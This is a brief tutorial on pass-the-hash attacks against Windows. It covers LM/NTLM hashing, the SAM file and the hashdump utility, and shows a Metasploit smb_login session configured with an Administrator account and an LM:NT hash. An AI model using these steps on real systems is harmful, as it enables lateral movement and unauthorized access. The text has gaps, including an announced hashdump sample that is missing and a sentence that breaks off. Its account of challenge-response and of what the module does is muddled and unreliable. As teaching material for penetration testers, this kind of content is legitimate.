Once a Windows user creates a username and password, the password is hashed by two algorithms: LM (LAN Manager), which is built on the DES (Data Encryption Standard) cipher, and NTLM (NT LAN Manager).

The two resulting hashes are stored side by side as a single LM:NT entry in the SAM (Security Account Manager) file. Once you have compromised one machine, you can leverage the hashes obtained with the hashdump utility.

The weakness in this whole process is that neither hash is salted: every time a user tries to access a resource on a system and is sent a challenge by that system to authenticate with a username and password, the password always hashes to the same value.

This is what amounts to a pass-the-hash attack: using an already obtained hash to authenticate to another machine. Metasploit uploads a service executable, runs it through the SCM (Service Control Manager) over the SVCCTL (MSRPC) interface and creates a Meterpreter session.

Below is a sample of a hashdump obtained after gaining entry into a machine:


We can now use the username Administrator and the password hash alongside it to access other resources.

Say we want to run the SMB (Server Message Block) login scanner that comes with Metasploit; we just set the

msf auxiliary(smb_lookupsid) > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > show options

Module options:

Name              Current Setting                                                    Required  Description
----              ---------------                                                    --------  -----------
BLANK_PASSWORDS   true                                                               yes       Try blank passwords for all users
BRUTEFORCE_SPEED  5                                                                  yes       How fast to bruteforce, from 0 to 5
PASS_FILE                                                                            no        File containing passwords, one per line
RHOSTS                                                                               yes       The target address range or CIDR identifier
RPORT             445                                                                yes       Set the SMB service port
SMBPass           aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0  no        SMB Password
SMBUser           Administrator                                                      no        SMB Username
STOP_ON_SUCCESS   false                                                              yes       Stop guessing when a credential works for a host
THREADS           1                                                                  yes       The number of concurrent threads
USERPASS_FILE                                                                        no        File containing users and passwords separated by space, one pair per line
USER_FILE                                                                            no        File containing usernames, one per line
VERBOSE           true                                                               yes       Whether to print output for all attempts

msf auxiliary(smb_login) > run